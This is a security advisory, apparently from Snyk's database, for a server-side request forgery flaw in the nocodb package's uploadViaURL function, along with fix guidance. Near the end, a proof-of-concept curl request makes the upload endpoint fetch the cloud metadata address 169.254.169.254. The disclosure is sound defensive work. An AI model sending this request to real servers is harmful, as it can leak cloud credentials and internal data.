Server-side Request Forgery (SSRF) Affecting nocodb package, versions <0.301.0


Severity

Recommended
0.0
low
0
10

CVSS assessment by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept
EPSS
0.01% (2nd percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Server-side Request Forgery (SSRF) vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-JS-NOCODB-15138981
  • published29 Jan 2026
  • disclosed28 Jan 2026
  • creditkolega-ai-dev

Introduced: 28 Jan 2026

CVE-2026-24767  (opens in a new tab)
CWE-918  (opens in a new tab)

How to fix?

Upgrade nocodb to version 0.301.0 or higher.

Overview

nocodb is a NocoDB

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) via the uploadViaURL function in the attachments.service.ts file. An attacker can trigger outbound requests to arbitrary URLs by supplying crafted input to the process before validation is enforced.

PoC

curl -X POST 'http://localhost:8080/api/v2/storage/upload-by-url' \
  -H 'Content-Type: application/json' \
  -H 'xc-auth: <token>' \
  -d '[{
    "url": "http://169.254.169.254/latest/meta-data/",
    "fileName": "test.txt"
  }]'

CVSS Base Scores

version 4.0
version 3.1